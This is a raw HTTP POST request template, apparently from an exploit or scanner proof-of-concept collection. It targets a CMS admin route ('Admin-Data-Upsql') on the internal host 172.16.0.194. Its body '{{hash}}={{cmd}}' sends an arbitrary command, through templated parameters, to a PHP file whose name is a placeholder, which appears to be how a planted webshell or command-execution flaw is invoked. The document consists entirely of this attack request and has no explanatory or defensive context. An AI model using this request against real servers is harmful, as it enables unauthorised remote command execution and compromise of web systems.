POST /{{filename}}.php?s=Admin-Data-Upsql HTTP/1.1
Host: 172.16.0.194
Proxy-Connection: keep-alive
Content-Length: 85
Pragma: no-cache
Cache-Control: no-cache
Origin: http://172.16.0.194
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.0.194/index.php?s=Admin-Data-Sql
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

{{hash}}={{cmd}}
